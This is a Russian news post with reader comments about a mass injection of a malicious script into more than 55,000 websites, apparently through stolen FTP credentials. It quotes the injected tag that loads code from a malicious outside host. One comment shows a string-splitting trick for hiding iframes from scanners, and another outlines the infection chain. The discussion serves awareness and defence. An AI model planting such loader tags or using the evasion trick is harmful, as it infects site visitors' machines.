55 тыс сайтов в Интернете оказались заражены одним и тем же iframe

    Как сообщает компания ScanSafe в своем блоге, сегодня в Интернете была проведена массированная XSS-атака. На более, чем 55 тыс сайтов медицинских услуг и благотворительных организаций, а также на такие ресурсы, как feedzilla.com, был внедрен вредоносный iframe. Специалисты ScanSafe вычислили, что он ведет на ресурс a0v.org, с которого подгружаются еще несколько эксплойтов. При этом, как отмечают в ScanSafe, количество зараженных ресурсов продолжает расти: на момент распространения новостей в западных СМИ (TechRepublic, ZDNet), количество зараженных доменов перевалило за 55 тыс.

    PS: собственно вот каким iframe заразили столько сайтов:
    “script src=http://a0v.org/x.js”

    В Рунете таких ресурсов довольно-таки мало, Google (чем и пользуются ScanSafe) видит этот код, например, на поддоменах product.ru

    Похожие публикации

    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 65

      +2
      А каким образом заражают такое огромное количество сайтов?
        –7
        >> сегодня в Интернете была проведена массированная XSS-атака

        что не понятно?
          +2
          Не понятно на самом деле. Для такой массированной XSS нужен один тип движков.
            +2
            А вот выяснилось, про XSS это бред.
            Вот ответ: www.milw0rm.com/exploits/9508
              0
              Поторопился ;) Спутал ProFTP и ProFTPd
              –1
              >> сайтов медицинских услуг и благотворительных организаций
              это как раз таки и наталкивает на мысль об одном типе (либо весьма схожем) движка
                +1
                Первичный круг заражения: icq\skype\mail: пинчем скажем
                Вторичный круг заражения: угнанные с помощью пинча пароли использует робот для заражения подконтрольных первому кругу хостов. Далее люди заходят на хосты, и если у них машинки не безопасны, то получают себе зверюжку. Цикл повторяется.
            +5
            Воруют пароли от FTP троянами с компьютеров вебмастеров, вставляют iframe в код, зачастую этот код ломая. Пачками. Вечный бич хостинг-провайдеров.
              +1
              Не понимаю, как за день можно было угнать и отдефейсить 50 тысяч сайтов.
                +1
                Как было в этой ситуации — не знаю. А обычно благодаря товарищам, которые меняют пароль раз в год. Строяненые пароли от FTP, SSH, админок сайтов и блогов копятся, формируются в базы и продаются пачками — читайте любой хакерский форум.
                  0
                  На 99.9% уверен, что пароли тут совсем не причем. Просто владельцы сайтов (админами таких называть неверно), элементарно скачали своему wordpress/joomla/oscommerce/богзнаетчтоеще тему оформления с «левого» сайта, и поленились хотя бы пробежать глазами ее код. Таких «левых» сайтов с сомнительными «добавками» к теме в рунете миллион, не говоря про остальные интернеты…
                    +7
                    как человек работающий в хостинге всё же смею Вам возразить.
                    80% это залитые боты и «пропатченные» ифреймами страницы сделаны по ftp.
                    оставшиеся 20% через уязвимости.

                    т.е., как правило фишинговые страницы заливаются через уязвимость, а распихивание ифреймов через ftp.

                    ftp аккаунты в огромном количестве продаются на античатоподобных сайтах, и есть комплекс ПО написаный на перле который работает на любом хостинге и в час Х начинает распихивать ифреймы.

                    недавно вот столкнулись с новым типом «заливок», это очень хитрые дорвеи которые создают дикую нагрузку на сервер. но тут не о них речь. надо бы отдельным постом раскрыть всю тему.
                      0
                      не поленитесь пожалуйста, наваяйте статейку, с акцентом на методы защиты конечно.
                        +1
                        Напишу обязательно, тем более назрело уже давно «раскрыть тему», но видимо на каком-то другом ресурсе опубликовать придется. тут карма не позволяет.
                          0
                          Да уж, видимо за руцентр вам по карме надавали…
                        0
                        вообще было бы интересно послушать человека из хостинг-сферы на предмет безопасности и вообще — для рядовых пользователей/вебмастеров
                          +1
                          обязательно напишу, в последнее время тема более чем актуальная.
              0
              Аха, частенько просят объяснить почему гугли или яндекс банит сайты )
                +1
                Обычно трояны такого типа внедряют в варезный софт для вебмастеров, разные ломаные photoshop, dreamweaver, etc самопальных сборок.
                Идея такая, почему бы не внедрять javascript код который будет удалять все iframe-ы, кроме разрешенных… Я бы делал это на уровне хостера.
                  +3
                  Это достаточно сложно реализовать. Я работаю в одной хостинг компании и мы постоянно сталкиваемся с подобного рода вирусами.
                  Как вариант рассматривали включение связки proftpd + clamav на уровне сервера, но из этого ничего не вышло так как clamav очень плохо отлавливает iframe. + ко всему были проблемы с падением скорости загрузки через фтп файлов.
                  Как вариант — взять у того-же гугла базу данных сайтов с троянами и парсить её самописным скриптом, работающим как патч к proftpd
                    0
                    у нас успешно внедрен на нагруженных хостинговых серверах proftpd+clamav, но как Вы и сказали ловит он очень небольшой процент «заливок», по тому как распознает он их по «вражескому» домену из своей базы.

                      0
                      Скажите, пожалуйста, а у Вас clamd работает локально, либо Вы используете патч для удаленного соединения с clamd?
                    0
                    Это незаконно. Как и фильтрация файлов хостером.
                      +1
                      Где именно это прописано?
                        +1
                        Статья 272 УК РФ. Неправомерный доступ к компьютерной информации.

                        Хостеру не дано право распоряжаться информацией клиента, а уж тем более ее менять автоматическими средствами. Строго по закону — он ее даже просмотреть не может.
                          +3
                          Хорошо, тогда нужно реализовывать это как отдельную услугу. И я на 100% уверен, что все клиенты будут согласны на её использование.
                            +2
                            on-the-fly проверка слишком сложна технически и ресурсоемка, а на хостинговых серверах лишних ресурсов нет никогда.

                            Некоторые хостеры реализуют схему обнаружения вирусов скриптами и отсылки уведомлений клиенту на email. Но это тоже не панацея — не все вирусы так можно обнаружить, не всегда клиент читает почту и часто самостоятельно устранить проблему не может.

                            Бывает, что аккаунт фактически ничей — владелец давно бросил свой сайт, а хостинг и домен проплачен на месяц-полгода-год вперед. Тогда сделать фактически ничего не получится, кроме блокировки аккаунта.
                            Хотя тут не исключен вариант, когда владелец узнает о том, что у него есть хостинг по факту отключения сайта и естественно будет недоволен. :)

                            Например юр. лицо, где старый хостинг регистрировал дизайнер, который уволился год назад.
                              0
                              Это юр.лицо в любом случае окажется сильно недовольно в конце срока аренды ;)
                        +1
                        Можно не модифицировать, а просто не пускать задетекченные файлы на сервер.
                        Если файл заливается не трояном, а через фтп-клиент, то пользователь получает сообщение — причину отказа.

                        Есть же, например, антивирус Касперского для почтовых серверов, который удаляет зараженные вложения. Это незаконно?
                        А коль вспомнили о 272, не забывайте и о статье 273 — Создание, использование и распространение вредоносных программ.
                      +1
                      >>PS: собственно вот каким iframe заразили столько сайтов:
                      >>“script src=http://a0v.org/x.js”

                      скорее этим (ссылка из выше приведенного)
                      js.tongji.linezing.com/1189582/tongji.js

                        +2
                        интересно почему домен a0v до сих пор не отключен?
                          • НЛО прилетело и опубликовало эту надпись здесь
                              0
                              OpenDNS очень хороший сервис. Жаль, что не так много людей им пользуется.
                              –6
                              Ну если честно то просто хостинг ломанули или несколько, посмотрите что эти сайты может объединять, а вдруг они на одном и то м же хосте висят )
                                +2
                                Вы правда думаете, что:

                                а) На одном(!) сервере висят 50000 сайтов.
                                б) Этот сервер так легко сломать. Хостеры вообще народ не глупый, особенно серьезные и с безопасностью там все хорошо.
                                в) Если кто-то его таки сломает, он будет тратить такую дыру на iframe?
                                  +1
                                  в) Если кто-то его таки сломает, он будет тратить такую дыру на iframe?
                                  по сути, только iframe и является самым простым способом монетизации взлома хостера. так что вполне стоит тратить.
                                    –1
                                    Ааага, примерно по 3-4 бакса за 1000 уников, русского трафика.
                                    0
                                    Ну к примеру я ломал хостера на 12 000 сайтов, народ то не глупый но не без дурака в семье
                                      +1
                                      Какая разница, сколько сайтов _у_хостера_?

                                      Важно, сколько их на одном сервере, который уязвим… Явно не 50000 :)
                                        0
                                        Важно где табличка с парольчиками от ftp. Многие хостеры из за системы восстановления именного старого пароля от фтд, хранят их в открытом виде — уж поверти )
                                          0
                                          а еще нередко, на всех серверах подсети один и тот же пароль тех.админа ;)
                                          сломал один — получил все.
                                            –1
                                            ага, ага
                                      –2
                                      А ещё для дебилов, я не говорил что они весели на одном сервере, я лишь сказал что они могли висеть на одном хостере у которого в свою очередь есть единая база с логинами и паролями от FTP этих сайтов, которые располагаются на разных серверах.
                                  • НЛО прилетело и опубликовало эту надпись здесь
                                      –2
                                      Результаты 1 — 10 из примерно 71 800 для «a0v.org/x.js». (0,07 секунд)
                                      cool =))
                                        0
                                        Что то я так и не понял что делает js.tongji.linezing.com/1189582/tongji.js, похоже на сбор статистики. Далее запрос идет сюда dt.tongji.linezing.com/ystat.do с кукаки и даже тайтлами сайта.
                                          0
                                          Только эта атака не называется XSS. Не всякое внедрение js-кода является XSS. Тут «просто» массовый рутинг. Интересно, ботнет кто-нибудь сделал?
                                            +1
                                              0
                                              Такая же проблема была у знакомого, поставил скрипт, который чистит все файлы от ифреймов.
                                                0
                                                Поделитесь скриптиком? :)
                                                0
                                                Хм, я заметил что все сайты были на ASP
                                                Google
                                                +1
                                                Вполне можно написать php скрипт который будет лопатить файлы на сервере с расширениями возможными и искать все iframe… И яву с какимнибудь base64 ))))) хотя есть у некоторых хостеров сканер на вирусы, но сомневаюсь, что он подобные вещи может найти…
                                                  0
                                                  Полный автомат не выйдет — эти вирусы постоянно меняют адреса и типы файлов. Вырезать слепо все iframe тоже не вариант — они бывает используются и по делу. Все равно придется сажать человека на контроль результатов.
                                                    0
                                                    можно отправлять уведомление юзеру, если на его сайте появился iframe, кроме адвордса и других известных сервисов, использующих iframe.
                                                        0
                                                        Очень интересный скрипт, спасибо!
                                                      0
                                                      Тогда уже на перле. Пхп плохо справляется с объемными файлами.

                                                      И вообще плохо и медленно работает с чтением/записью массового числа файлов.
                                                        0
                                                        а можно вставлять, например, как-нибудь так:

                                                        print('<if' + 'r' + 'am' + 'e' + ' src=' .....etc);

                                                        попробуй, поймай ;)
                                                        0
                                                        1. Клиент лазит по зараженным сайтам своим интернет эксплорером.
                                                        2. Ловит трояна через обфусцированную обёртку на js (внутри файл exe)
                                                        3. Троян сканирует диски клиента на предмет определенных программ, которые могут содержать пароли.
                                                        4. Затроянивание страничек по фтп аккаунтам происходит не сразу.
                                                        5. Через примерно месяц приходят с разных адресов боты и модифицируют все index.* файлы.

                                                        Обычно всё это надо для построения ботнет сети с разными деструктивными целями.
                                                          +1
                                                          у меня была такая зараза недавно. 50 сайтов вычищал.
                                                          угнаны были пароли к фтп потому что хранились в тотале

                                                          похватил заразу через уже зараженный сайт
                                                            0
                                                            да, тоже проходил такое, теперь все заплатки стоят, пароли отдельно, тотал — отдельно
                                                            0
                                                            убейте того кто заражает сайты таким образом.
                                                            я два раза вычищал по 30 сайтов. (((
                                                              0
                                                              Была такая же проблема на одном из сайтов.
                                                              Но не думаю, что через угонку фтп. Доступ к фтп был только у меня, а у меня линукс. Этот сайт давно не трогал.

                                                              Сайт наполняли редактора. У одной из них был заражен комп и она начала жаловаться «У меня вечно вставляется странный текст, когда сохраняю новость». Странным текстом и был iframe. Насколько я понял, через браузер вставлялся текст с помощью вируса. Почистили компы, поудаляли в текстах и перестало появляться.

                                                              Мне кажется тут много путей заражения…

                                                              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                              Самое читаемое